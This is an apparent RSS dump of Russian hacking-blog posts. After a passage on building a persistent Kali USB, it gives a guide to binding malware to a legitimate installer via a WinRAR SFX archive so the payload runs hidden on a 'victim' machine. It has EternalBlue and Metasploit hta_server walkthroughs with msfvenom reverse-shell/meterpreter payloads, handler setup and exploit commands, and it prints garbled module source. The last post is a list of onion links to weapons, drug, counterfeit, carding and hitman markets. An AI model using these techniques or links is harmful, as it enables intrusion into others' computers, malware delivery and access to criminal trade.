  <p>После нужно вставить флешку в компьютер, а потом открыть руфус.<br />Руфус сам определит флешки</p>
  <p></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/f8/ca/f8cae71a-158b-4255-bc11-170db649637b.jpeg" width="427" />
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/b9/df/b9dff6dc-cf0a-4a5b-aa0c-89607416a9e1.jpeg" width="421" />
  </figure>
  <p>Теперь немного подождем.---------------------------------------------------------------------— ВСЕ! теперь надо перезагрузить компьютер и зайти в биос (что бы узнать как это сделать посмотрите в гугле, у всех разные кнопки)<br />после этого надо в биосе поставить загрузку с флешки (у всех тоже по разному но скрин покажу)</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/23/36/2336ff7e-f31a-44e9-baeb-8e25da934ec9.jpeg" width="960" />
  </figure>
  <p>Теперь сохраняем настройки и выходим из биоса...<br />Браво!</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/75/5a/755a2f40-0909-4c3d-8215-cecc2e088fb3.jpeg" width="1200" />
  </figure>
  <blockquote></blockquote>
  <p></p>
  <p>Этой командой мы посмотрели диски вы должны увидеть диск /dev/sda</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/0b/5b/0b5bbe44-1482-4ed9-b640-7bfedd810e0b.jpeg" width="921" />
  </figure>
  <p>После чего, прописываем код:</p>
  <pre>gparted</pre>
  <p>У вас откроется окошко, после чего делаем это:</p>
  <p> вас откроется окошко, после чего делаем это:</p>
  <p></p>
  <p>У вас откроется окошко, после чего делаем это:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/1f/68/1f68f28b-1e07-4862-a98d-47fc5f5e78b3.jpeg" width="821" />
  </figure>
  <p>После этого можно закрыть окно. Дальше прописываем снова &quot;fdisk - l&quot; и смотрим какое имя у persistence - обычно это sda или sdb.<br />Код:</p>
  <pre>mkdir -p /mnt/sda3 (sdb3)
mount /dev/sda3 /mnt/sda3 (sdb3)
echo &quot;/ union&quot; &gt; /mnt/sda3/persistence.conf
umount /dev/sda3 (sdb3)</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/e9/af/e9afb486-8b0c-4bb0-aceb-5a5cbe69265a.jpeg" width="995" />
  </figure>
  <p>Надеюсь, я все понятно рассказал.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hackeronline/tIVZvZJue</guid><link>https://teletype.in/@hackeronline/tIVZvZJue?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><comments>https://teletype.in/@hackeronline/tIVZvZJue?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline#comments</comments><dc:creator>hackeronline</dc:creator><title>Склейка вирусов через winrar</title><pubDate>Thu, 04 Jun 2020 16:31:12 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/2d/5f/2d5f4dc4-62e4-46c0-a419-86442ae6abe9.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/38/ea/38eaffd9-f6a6-4e42-9686-ebc24ed5a292.jpeg"></img>Статья создана исключительно в целях ознакомления и не призывает к действиям!]]></description><content:encoded><![CDATA[
  <p>Статья создана исключительно в целях ознакомления и не призывает к действиям!</p>
  <hr />
  <p>Начнём с того, что из себя представляет склейка. <br />Склейка - это совмещение нескольких файлов в один. При создании вирусов она часто используется. <br />Типичный пример: у нас есть два exe. Один из них - обычный установщик word, а второй - вирус, который незаметно поражает систему. И есть жертва, которой надо закинуть вирус. Отправлять сам вирус палевно. После того, как человек запустит файл и увидит, что происходит не то, что он ожидал, он насторожится. Для таких целей и существует склейка. Она помогает создать exe, который будет вести себя как обычная программа или даже установщик, а вирус будет запущен в фоне.<br />Сегодня мы познакомимся с одним из способов склейки вирусов с исполняемыми файлами.</p>
  <hr />
  <p>Склейка через winrar<br />Этот метод является наиболее оптимальным среди простых методов склейки. На выходе мы получаем один исполняемый файл, который будет вести себя как исходная программа. Поскольку winrar - легитимная программа, она не добавляет новых детектов конечному файлу.</p>
  <hr />
  <p>Подготовка<br />В системе должен быть установлен winrar. Для удобство лучше переместить файл вируса и файл, под который вирус будет маскироваться, в одну папку. В этом примере будет использоваться программа notmyfault, а в качестве вируса безобидная программа, которая просто покажет окно с текстом, что она запустилась.<br />Важно убедиться, что программа, с которой производится склейка, не должна иметь зависимостей. Например, нельзя просто выдернуть exe из установленной программы и отправить его кому-то. Скорее всего такая программа не заработает, потому что ей будет не хватать библиотек или файлов конфигурации.<br /></p>
  <hr />
  <p>Шаг 1<br />Выделяем файл вируса и конечной программы</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/38/ea/38eaffd9-f6a6-4e42-9686-ebc24ed5a292.jpeg" width="213" />
  </figure>
  <p>Шаг 2<br />Нажимаем правой копкой мыши и выбираем Добавить в архив.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/84/ac/84ac3d48-989a-43a8-9307-b99e72538272.jpeg" width="265" />
  </figure>
  <p>Шаг 3<br />Установите галочки &quot;Create SFX archive&quot;, &quot;Create solid archive&quot; и &quot;Lock archive&quot;</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/83/c9/83c99639-ac92-459a-a034-5bc17213b963.jpeg" width="477" />
  </figure>
  <p>Шаг 4<br />Во вкладке &quot;Advanced&quot; откройте &quot;SFX options...&quot;</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/df/69/df696c11-9309-4458-a586-e5e1e370070e.jpeg" width="451" />
  </figure>
  <p>Шаг 5<br />Во вкладке &quot;Setup&quot; на первой строке напишите имя программы, под которую маскируется вирус. Писать надо полное имя с расширением. С новой строки напишите имя файла вируса.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/86/f3/86f31015-4552-4a84-92b8-0732f1eef9a7.jpeg" width="511" />
  </figure>
  <p>Порядок можно поменять. Тогда вирус запустится первым. Но это можно делать лишь с теми вирусами, которые переносят исполняемый файл после перезапуска. Иначе основная программа не запустится, пока вирус не завершит работу.<br />Шаг 6<br />Во вкладке &quot;Modules&quot; установите галочку &quot;Unpack to temporary folder&quot; и в &quot;Silent mode&quot; выбирите &quot;Hide all&quot;</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/44/2a/442aded3-6dce-4ba2-b84b-acf58e09fabe.jpeg" width="505" />
  </figure>
  <p>Шаг 7<br />На вкладке &quot;Update&quot; в &quot;Overwrite mode&quot; поставьте &quot;Overwrite all files&quot;</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/73/a3/73a3415a-1589-4608-8f5c-403c639962c1.jpeg" width="513" />
  </figure>
  <p>Результат<br />В результате в папке с исходными файлами будет создан ещё один. Это и есть комбинированная программа, которая ведёт себя как исходный exe, но имеет в себе функции вируса.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/de/86/de860a52-1d59-4047-a2a7-962b74653bee.jpeg" width="213" />
  </figure>
  <p>Проверка<br />В результате запуска полученного файла в системе исполнится склеенный вирус, поэтому не надо запускать его на виртуалках не предназначенных для тестов.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/1e/fd/1efdf352-6544-44ea-b9ac-dcebb908b081.jpeg" width="691" />
  </figure>
  <p>После запуска exe открылась основная программа, после закрытия которой появилось это окно. Оно отобразилось потому что в качестве вируса было приложение, которое выводит, что система заражена. Настоящий вирус запускается в фоне без создания окон.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hackeronline/5RpBBEklih</guid><link>https://teletype.in/@hackeronline/5RpBBEklih?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><comments>https://teletype.in/@hackeronline/5RpBBEklih?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline#comments</comments><dc:creator>hackeronline</dc:creator><title>Версия эксплоит ETERNALBLUE на Python.</title><pubDate>Thu, 04 Jun 2020 12:43:49 GMT</pubDate><description><![CDATA[<img src="https://teletype.in/files/8a/49/8a4992f5-46b2-404f-9b87-b739a556a980.jpeg"></img>И так, инструменты:
Kali Linux
NASM
Python v2.7
Metasploit Framework]]></description><content:encoded><![CDATA[
  <p>И так, инструменты:<br />Kali Linux<br />NASM<br />Python v2.7<br />Metasploit Framework</p>
  <p></p>
  <p></p>
  <p>Тестируемый хост должен иметь включенную гостевую учетную запись(иначе получите ошибку) или известную пару логин:пароль!</p>
  <p>Шелл-код уровня ядра берем здесь:<br />https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file-eternalblue_x64_kshellcode-asm</p>
  <p>Проведем два вида атаки:<br />1. получим обратный шелл через TCP<br />2. получим сессию в meterpreter.<br />Готовим начинку:<br />Сохраняем .аsm файл и компилируем: nasm -f bin kernel_shell_x64.asm.</p>
  <p>#msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=[хост атакующего] LPORT=4444</p>
  <p>#msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=[хост атакующего] LPORT=4444</p>
  <p>Сольем шелл-код и полезную нагрузку в экстазе:<br />#cat kernel_shell_x64 shell_msf.bin&gt;reverse_shell.bin<br />#cat kernel_shell_x64 meterpreter_msf.bin&gt;meterpreter.bin</p>
  <p>Готовим Metasploit к тесту:<br />&gt; use exploit/multi/handler<br />&gt; set PAYLOAD windows/x64/shell/reverse_tcp<br />&gt; set LHOST IP_ATTACKER<br />&gt; set LPORT 4444<br />&gt; exploit<br />*Started reverse *****<br />*Started payload *****<br />(нехай ждет )</p>
  <p>Качаем эксплоит от Sleepya. Берем здесь:<br />https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e.<br />Сохраняем как exploit.py</p>
  <p>Готовим сплойт для тестирования с использованием на тачке с не отключенной гостевой учетной записью.<br />Ищем в сплойте строки 42 и 43 и заполняем:<br />PASSWORD=&#x27; &#x27;<br />(Если известны пара L:P применяем их)</p>
  <p>Запускаем:<br />#python exploit.py &lt;ip<em>жертвы&gt; reverse</em>shell.bin 500</p>
  <p></p>
  <hr />
  <figure class="m_original">
    <img src="https://teletype.in/files/8a/49/8a4992f5-46b2-404f-9b87-b739a556a980.jpeg" width="623" />
  </figure>
  <p>Версия эксплоит ETERNALBLUE на Python.<br />​После запуска сплойта, получаем сессию в Metasploit.<br />Аналогично поступаем для создания сессии с meterpreter.<br />Готовим Метасплоит:</p>
  <p>&gt; use exploit/multi/handler<br />&gt; set PAYLOAD windows/x64/meterpreter/reverse_tcp<br />&gt; set LHOST IP<br />&gt; set LPORT 4444<br />&gt; exploit</p>
  <p>Редактируем exploit.py (см. выше)<br />Стартуем эксплоит:<br />python exploit.py &lt;ip_жертвы&gt; meterpreter.bin 200</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/44/24/44242e6f-e9b6-4746-bd63-d6e8b71a2d7d.jpeg" width="624" />
  </figure>
  <p>Версия эксплоит ETERNALBLUE на Python.<br />​Значение параметра numGroomConn установим в 200 для уменьшения количества соединений<br />(500 многовато, практически всегда атакуемая машина выпадает в Time-out, оптимально на мой взгляд ставить 300)<br />Получаем сессию.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/17/7e/177e5287-d9ad-43fd-99f4-88b2e8b3cc4b.jpeg" width="623" />
    <figcaption>Версия эксплоит ETERNALBLUE на Python.<br />ЗЫ: Тестировал на машинах(шт.-15), которые ранее не смог пробить стандартным eternalblue_doublepulsar и ms17_010_eternalblue, результат - примерно на 15-25% хостов(Win7,Win8,Win2012) удалось получить сессию</figcaption>
  </figure>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hackeronline/aGqhosCV9</guid><link>https://teletype.in/@hackeronline/aGqhosCV9?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><comments>https://teletype.in/@hackeronline/aGqhosCV9?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline#comments</comments><dc:creator>hackeronline</dc:creator><title>Взлом удаленного ПК. HTA-server.</title><pubDate>Thu, 04 Jun 2020 12:30:59 GMT</pubDate><description><![CDATA[<img src="https://teletype.in/files/67/64/676433f9-159c-4d04-90f1-aaa668e30ac7.jpeg"></img>Всем привет! В этой статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии meterpreter c помощью эксплойта - hta_server.]]></description><content:encoded><![CDATA[
  <p>Всем привет! В этой статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии meterpreter c помощью эксплойта - hta_server.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/67/64/676433f9-159c-4d04-90f1-aaa668e30ac7.jpeg" width="623" />
  </figure>
  <p>Появился он недавно в версии Metasploit Framework v4.12.34</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/95/bc/95bc52a5-6311-4e6c-9442-209093d2e8ac.jpeg" width="623" />
  </figure>
  <p>так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:<br />&gt; apt-get update &amp;&amp; apt-get upgrade –y &amp;&amp; apt-get dist-upgrade<br />Запускаем Metasploit Framework:<br />&gt; msfconsole<br />В появившейся консоли фреймворка пишем:</p>
  <hr />
  <blockquote>use exploit/windows/misc/hta<em>server<br />set payload /windows/meterpreter/reverse</em>tcp<br />set LHOST 172.16.0.160<br />set SRVHOST 172.16.0.160<br />set LPORT 4444<br />exploit</blockquote>
  <hr />
  <p>Теперь если все проделано, верно, видим экран с таким содержимым:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/da/f7/daf714fe-61d6-4162-87ab-1efd768e46e3.jpeg" width="623" />
  </figure>
  <p></p>
  <p>Теперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.<br />Вторая, это ссылка которую необходимо доставить нашей цели, но не просто доставить, а убедить в том, что по ней необходимо перейти <br />А третья, собственно, о том, что был поднят веб-сервер на локальном адресе.<br />Перейдем по ссылке на целевой машине:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/43/43/434383d3-9925-42be-8f11-8240f7c14627.jpeg" width="623" />
  </figure>
  <p>Вернувшись к консоли линукс, мы видим, что сервер сообщает о доставке полезной нагрузки обратившемуся к нему адресу 172.16.0.139.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/13/14/1314c196-ed91-4fce-968a-5da90d1cf5d6.jpeg" width="623" />
  </figure>
  <p></p>
  <p>Вернемся к целевому хосту и скачаем то, что было предложено сервером.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/f0/99/f099987d-e3bb-4662-86c4-cbb0e766fa70.jpeg" width="624" />
  </figure>
  <p>Как видно, сервер сгенерировал нам некое приложение .hta - HTML Application (HTA) — приложение, написанное на HTML или Dynamic HTML.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/79/87/79873350-1e07-4326-8b27-eb02a459090a.jpeg" width="623" />
  </figure>
  <p>После запуска получаем готовую рабочую сессию meterpreter.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/b7/f6/b7f63891-3d60-47ce-8a39-500f7b690408.jpeg" width="623" />
  </figure>
  <p>Объясню, как это происходит, созданное приложение открыло в фоновом режиме другое приложение, которое может работать скрытно от глаз пользователя, зовется оно PowerShell - Представляет собой современную стандартизированную оболочку командной строки, обеспечивающую большую гибкость управления компьютером на базе операционной системы Windows. По сути, PowerShell — это та же командная строка, но только намного более функциональная. Увидеть ее можно, набрав в пуске - powershell</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/f7/86/f7864105-7d1c-429e-b8c1-de72dad699d2.jpeg" width="623" />
  </figure>
  <p>PowerShell содержащий полезную нагрузку обнаруживается в диспетчере задач:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/97/a4/97a49712-27dc-4636-853e-8cd10e7f42a6.jpeg" width="623" />
  </figure>
  <p>Итак, по поводу нагрузки все ясно. Дальнейшие действия зависят от фантазии.<br />Я бы хотел обратить внимание на один очень важный, по моему мнению момент. Взглянем на исходный код скрипта, который находится /usr/share/metasploit-framework/modules/exploit/windows/misc/hta_server.rb написан он на Ruby:</p>
  <hr />
  <p>##<br /># This module requires Metasploit: <a href="https://metasploit.com/download" target="_blank">http://metasploit.com/download</a><br /># Current source: <a href="https://github.com/rapid7/metasploit-framework" target="_blank">https://github.com/rapid7/metasploit-framework</a><br />##<br />class MetasploitModule &lt; Msf::Exploit::Remote<br />  Rank = ManualRanking<br />  include Msf::Exploit::Remote::HttpServer<br />  def initialize(info = {})<br />    super(update<em>info(info,<br />      &#x27;Name&#x27;           =&gt; &#x27;HTA Web Server&#x27;,<br />      &#x27;Description&#x27;    =&gt; %q(<br />        This module hosts an HTML Application (HTA) that when opened will run a<br />        payload via Powershell. When a user navigates to the HTA file they will<br />        be prompted by IE twice before the payload is executed.<br />      ),<br />      &#x27;License&#x27;        =&gt; MSF</em>LICENSE,<br />      &#x27;Author&#x27;         =&gt; &#x27;Spencer McIntyre&#x27;,<br />      &#x27;References&#x27;     =&gt;<br />        [<br />          [&#x27;URL&#x27;, &#x27;<a href="https://www.trustedsec.com/july-2015/malicious-htas/" target="_blank">https://www.trustedsec.com/july-2015/malicious-htas/</a>&#x27;]<br />        ],<br />      # space is restricted by the powershell command limit<br />      &#x27;Payload&#x27;        =&gt; { &#x27;DisableNops&#x27; =&gt; true, &#x27;Space&#x27; =&gt; 2048 },<br />      &#x27;Platform&#x27;       =&gt; %w(win),<br />      &#x27;Targets&#x27;        =&gt;<br />        [<br />          [ &#x27;Powershell x86&#x27;, { &#x27;Platform&#x27; =&gt; &#x27;win&#x27;, &#x27;Arch&#x27; =&gt; ARCH<em>X86 } ],<br />          [ &#x27;Powershell x64&#x27;, { &#x27;Platform&#x27; =&gt; &#x27;win&#x27;, &#x27;Arch&#x27; =&gt; ARCH</em>X86_6<em>64 } ]<br />        ],<br />      &#x27;DefaultTarget&#x27;  =&gt; 0,<br />      &#x27;DisclosureDate&#x27; =&gt; &#x27;Oct 06 2016&#x27;<br />    ))<br />  end<br />  def on</em>quest_uri<em>uri(cli, _request)<br />    print</em>us(&#x27;Delivering Payload&#x27;)<br />    p = regenerate_paylo<em>payload(cli)<br />    data = Msf::Util::EXE.to</em>able_fmt(<br />  <em>fmt(<br />      framework,<br />      target.arch,<br />      target.platform,<br />      p.encoded,<br />      &#x27;hta-psh&#x27;,<br />      { :arch =&gt; target.arch, :platform =&gt; target.platform }<br />    )<br />    send</em>(cli, data, &#x27;Content-Type&#x27; =&gt; &#x27;application/hta&#x27;)<br />  end<br />  def random_uri<br />    #<em>uri<br />    # uri needs to end in .hta for IE to process the file correctly<br />    &#x27;/&#x27; + Rex::Text.rand</em>numeric(rand(10) + 6) + &#x27;.hta&#x27;<br />  end<br />end</p>
  <hr />
  <p>Строка &#x27;/&#x27; + Rex::Text.rand_text_alphanumeric(rand(10) + 6) + &#x27;.hta&#x27; определяет название выходного файла. Данный метод генерирует абсолютную дичь, состоящую из 10 + -рандомных чисел и букв. (Fg8FGn34f9.hta) Предлагаю исправить это на более приемлемый вариант.<br />Делается это путем изменения метода .rand_text_alphanumeric на метод .uri_encode<br />В одинарных кавычках пишем, все что угодно. На этом все. Спасибо за внимание.</p>
  <p>P.S. Осталось подумать, как приделать к нему более симпатичный ярлык…<br />P.P.S. Статья не является руководством к действию и опубликована исключительно в ознакомительных целях. За последствия вызванные применением данного метода на практике автор и ресурс, ответственности не несут.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hackeronline/uWiK18qt8</guid><link>https://teletype.in/@hackeronline/uWiK18qt8?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><comments>https://teletype.in/@hackeronline/uWiK18qt8?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline#comments</comments><dc:creator>hackeronline</dc:creator><title>Огромный список onion сайтов.</title><pubDate>Thu, 04 Jun 2020 08:35:11 GMT</pubDate><description><![CDATA[Вся представленная информация несёт лишь ознакомительный характер и не призывает Вас к действиям нарушающим закон!
Поисковики(без цензуры):]]></description><content:encoded><![CDATA[
  <p>Вся представленная информация несёт лишь ознакомительный характер и не призывает Вас к действиям нарушающим закон!<br />Поисковики(без цензуры):</p>
  <p>2.Torch http://xmh57jrzrnw6insl.onion/<br />3.Candle http://gjobqjj7wyczbqie.onion/</p>
  <p><br />5.DuckDuckGo https://3g2upl4pq6kufc4m.onion/</p>
  <p>Нелегальные товары:<br />Техника и электроника<br />1.Цифровая техника и аксессуары за Биткоин http://amazonfkuuy6g3ou.onion<br />2.Смартфоны, ноутбуки, планшеты, фотоаппараты http://cardedlxzxsphu5y.onion<br />3.Продукция Apple, Samsung, Sony и HTC http://electrotev3tgo2p.onion<br />5.iPhone и линейка Galaxy http://mobileay2syyw6qf.onion<br />Оружие<br />1.Freedom, форум и маркет. На русском. http://freexd7d5vpatoe3.onion<br />2.Английский магазин оружия http://gunsdtk47tolcrre.onion</p>
  <p>3.Английский маркет <a href="http://kp6yw42wb5wpsd6n.onion" target="_blank">http://kp6yw42wb5wpsd6n.onion</a><br />4.Английский маркет <a href="http://ttagroupnnowjzzx.onion" target="_blank">http://ttagroupnnowjzzx.onion</a><br />5.Black Market Guns. На английском <a href="http://5xxqhn7qbtug7cag.onion" target="_blank">http://5xxqhn7qbtug7cag.onion</a><br />6.Русский маркет <a href="http://rashadowwxave5qp.onion" target="_blank">http://rashadowwxave5qp.onion</a><br />7.Оружие, наркотики, кардинг <a href="http://pwoah7foa6au2pul.onion/challenge.php" target="_blank">http://pwoah7foa6au2pul.onion/challenge.php</a><br />Поддельные документы<br />1.Продажа цифровых документов <a href="http://fightckxiykml2xu.onion" target="_blank">http://fightckxiykml2xu.onion</a><br />1.(доллары) <a href="http://counter5y4he3hny.onion" target="_blank">http://counter5y4he3hny.onion</a><br />3.(евро+доллары) <a href="http://counterfxhjvtrlw.onion" target="_blank">http://counterfxhjvtrlw.onion</a><br />5.(разные валюты) <a href="http://cfactoryxecooa6l.onion" target="_blank">http://cfactoryxecooa6l.onion</a><br />1.Форум, посвященный насилию <a href="http://hurtmehpneqdprmj.onion" target="_blank">http://hurtmehpneqdprmj.onion</a><br />2.Насилие, жесть <a href="http://6php2xx6vczbmgcr.onion" target="_blank">http://6php2xx6vczbmgcr.onion</a><br />3.Живодёры <a href="http://73lgals6htl7akfm.onion" target="_blank">http://73lgals6htl7akfm.onion</a><br />4.Борда с жестью <a href="http://oxwugzccvk3dk6tj.onion/gore/index.html" target="_blank">http://oxwugzccvk3dk6tj.onion/gore/index.html</a><br />3.Англоязычный кардинг-форум <a href="http://kickassugvgoftuk.onion" target="_blank">http://kickassugvgoftuk.onion</a><br />4.Кардинг и хакерство <a href="http://qzbkwswfv5k2oj5d.onion" target="_blank">http://qzbkwswfv5k2oj5d.onion</a><br />(Alphabay market. Англоязычная площадка о кардинге, наркоте, оружии) <a href="http://pwoah7foa6au2pul.onion/challenge.php" target="_blank">http://pwoah7foa6au2pul.onion/challenge.php</a><br />4.Покупка-продажа криптовалют <a href="http://24xbtc424rgg5zah.onion" target="_blank">http://24xbtc424rgg5zah.onion</a><br />5.Биткоины-рубли <a href="http://konvertr6667fiat.onion" target="_blank">http://konvertr6667fiat.onion</a><br />Прочее:<br />Хостинги. Их дохрена, но выложу немного. Если что-найдете сами<br /><a href="http://freedomsct2bsqtn.onion" target="_blank">http://freedomsct2bsqtn.onion</a>(Легендарный Freedom Hosting)<br /><a href="http://pic2torqdbtzkasl.onion" target="_blank">http://pic2torqdbtzkasl.onion</a>(pic2tor-Целых два месяца хранения файлов)<br /><a href="https://postimages.org/" target="_blank">https://postimage.org</a>(Клирнет-хостинг без ограничений по времени)<br />Зеркала сайтов<br /><a href="http://arhivachovtj2jrp.onion" target="_blank">http://arhivachovtj2jrp.onion</a>(архивач)<br /><a href="http://facebookcorewwwi.onion" target="_blank">http://facebookcorewwwi.onion</a>(лицо-книга)<br /><a href="http://brchanansdnhvvnm.onion" target="_blank">http://brchanansdnhvvnm.onion</a>(бразильчан)<br /><a href="http://rutorc6mqdinc4cz.onion" target="_blank">http://rutorc6mqdinc4cz.onion</a>(РуТор-зеркало)<br /><a href="http://uj3wazyk5u4hnvtk.onion" target="_blank">http://uj3wazyk5u4hnvtk.onion</a>(тоже известный торрент)<br />Почты и общение<br /><a href="http://torbox3uiot6wchz.onion" target="_blank">http://torbox3uiot6wchz.onion</a>(ТорБокс-самый известный почтовый ящик)<br /><a href="http://bah37war75xzkpla.onion" target="_blank">http://bah37war75xzkpla.onion</a>(ящик-анонимное общение. Шифруется)<br /><a href="http://enotegggr635n4lw.onion" target="_blank">http://enotegggr635n4lw.onion</a>(одноразовые сообщения)<br />Форумы<br /><a href="http://lwplxqzvmgu43uff.onion" target="_blank">http://lwplxqzvmgu43uff.onion</a>(Рунион-страрейший форум, работает с 2012 года. Дел с ними иметь не советую, но почитать можно.)<br /><a href="http://exoduockgfq3ikf7.onion" target="_blank">http://exoduockgfq3ikf7.onion</a>(Хацкеры. Можно скачать троян и взломать вк одноклассницы)<br /><a href="http://kdrcxean24rxglcy.onion" target="_blank">http://kdrcxean24rxglcy.onion</a>(Скрытые Ответы. Можно задать вопрос)<br /><a href="http://answerstedhctbek.onion" target="_blank">http://answerstedhctbek.onion</a>(Те же ответы, только на английском)<br /><a href="http://fantomwf4luxar7u.onion" target="_blank">http://fantomwf4luxar7u.onion</a>(Форум Фантом. для настоящих параноиков)<br /><a href="http://secretsxsrvlpawm.onion" target="_blank">http://secretsxsrvlpawm.onion</a>(Прочитать/написать секреты)<br /><a href="http://tetatl6umgbmtv27.onion" target="_blank">http://tetatl6umgbmtv27.onion</a>(Чатик)<br /><a href="http://onelonhoourmypmh.onion" target="_blank">http://onelonhoourmypmh.onion</a>(Анонимные русские блоги без цензуры)<br /><a href="http://blackhau4shlmdvg.onion" target="_blank">http://blackhau4shlmdvg.onion</a><br /><a href="http://teranovif5tsxdb6.onion" target="_blank">http://teranovif5tsxdb6.onion</a><br /><a href="http://rechardsp4x6tdrh.onion" target="_blank">http://rechardsp4x6tdrh.onion</a><br /><a href="http://slpwlkryjujyjhct.onion" target="_blank">http://slpwlkryjujyjhct.onion</a>(магазин sleepWalker&#x27;а)<br /><a href="http://rrydrab7aba7hilt.onion" target="_blank">http://rrydrab7aba7hilt.onion</a>(скупка инфы)<br /><a href="http://l33ter2w7q4bytfh.onion" target="_blank">http://l33ter2w7q4bytfh.onion</a><br /><a href="http://cmarketsiuhtiix5.onion" target="_blank">http://cmarketsiuhtiix5.onion</a>(инфа)<br /><a href="http://pekarmarkfovqvlm.onion" target="_blank">http://pekarmarkfovqvlm.onion</a>(покупка доступов к сайтам)<br /><a href="http://chbetteratd6wskq.onion" target="_blank">http://chbetteratd6wskq.onion</a>(платная проверка на лохотрон)<br /><a href="http://market7ow7cuw2hz.onion" target="_blank">http://market7ow7cuw2hz.onion</a>(создать свой магаз)<br /><a href="http://mystorea4mbkgt76.onion/online-store.php" target="_blank">http://mystorea4mbkgt76.onion/online-store.php</a>(создать свой магаз)<br />Найм специалистов<br /><a href="http://jymkf7sx7cldgsbl.onion" target="_blank">http://jymkf7sx7cldgsbl.onion</a>(создание .onion-сайтов)<br /><a href="http://deagles4ioy2rvkj.onion" target="_blank">http://deagles4ioy2rvkj.onion</a>(услуги киллеров)<br /><a href="http://face5njvqswhm7gf.onion" target="_blank">http://face5njvqswhm7gf.onion</a>(взлом акков фейсбука)<br /><a href="http://digigangxiehugqk.onion" target="_blank">http://digigangxiehugqk.onion</a>(хацкеры)<br /><a href="http://tordoxov3jitflky.onion" target="_blank">http://tordoxov3jitflky.onion</a>(продажа личной информации)<br />Вещества<br /><a href="http://rutorzzmfflzllk5.onion" target="_blank">http://rutorzzmfflzllk5.onion</a>(RuTOR)<br /><a href="http://xuytcbrwbxbxwnbu.onion" target="_blank">http://xuytcbrwbxbxwnbu.onion</a>(Зеркало РуТОР&#x27;а)<br /><a href="http://rusilkusru6f57uw.onion" target="_blank">http://rusilkusru6f57uw.onion</a>(Русский Силкроад.Крайне не рекомендую!!!)<br /><a href="http://wayawaytcl3k66fl.onion" target="_blank">http://wayawaytcl3k66fl.onion</a>(WayAway, древнейший драг-форум)<br /><a href="http://matangaezngvjcud.onion" target="_blank">http://matangaezngvjcud.onion</a>(Matanga)<br /><a href="http://rashadowwxave5qp.onion" target="_blank">http://rashadowwxave5qp.onion</a>(RASH, там еще много чего)<br /><a href="http://ramp5bb7v2abm34a.onion" target="_blank">http://ramp5bb7v2abm34a.onion</a>(РАМП. Нужен JS!!!)<br /><a href="http://rampshop72lq6kp6.onion" target="_blank">http://rampshop72lq6kp6.onion</a>(Моменталки от РАМПа)<br /><a href="http://playboyb2af45y45.onion" target="_blank">http://playboyb2af45y45.onion</a>(Проверенные моменталки)<br /><a href="http://xfmro77i3lixucja.onion" target="_blank">http://xfmro77i3lixucja.onion</a>(англ.)<br />И помните, что вся представленная информация несёт лишь ознакомительный характер и не призывает Вас к действиям нарушающим закон!</p>

]]></content:encoded></item></channel></rss>